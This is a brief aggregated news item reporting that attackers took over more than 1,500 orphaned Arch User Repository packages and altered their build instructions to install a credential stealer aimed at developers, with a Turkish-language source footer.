Arch Linux Packages Hijacked to Steal Developer Secrets Without Hacking
One of the largest open-source package repositories just spent a weekend cleaning up after a malware campaign that did not break into anything. It did not need to. Attackers seized control of more than 1,500 packages in the Arch User Repository, or AUR, the community-run software collection that sits alongside Arch Linux’s official repositories, and […] This story continues at The Next Web
Attackers have compromised over 1,500 packages in the Arch User Repository (AUR), a community-driven software collection for Arch Linux. Instead of traditional hacking, the attackers exploited the AUR's user-submission model by taking control of 'orphaned' packages. They subtly altered build instructions to install a credential stealer on users' machines upon compilation. This method, dubbed 'Atomic Arch' by security firm Sonatype, relied on manipulating trust rather than breaching code security. The compromised packages targeted developers specifically, aiming to steal credentials crucial for further supply-chain attacks. Arch Linux has temporarily frozen new account registrations while it addresses the security breach.
This sophisticated attack highlights a critical vulnerability in open-source software supply chains, demonstrating how trust can be exploited without traditional hacking.
📌 Kaynak
Bu haber XML kaynağından derlenmiştir. Tamamı için orijinal habere gidin.
Orijinal haberi oku →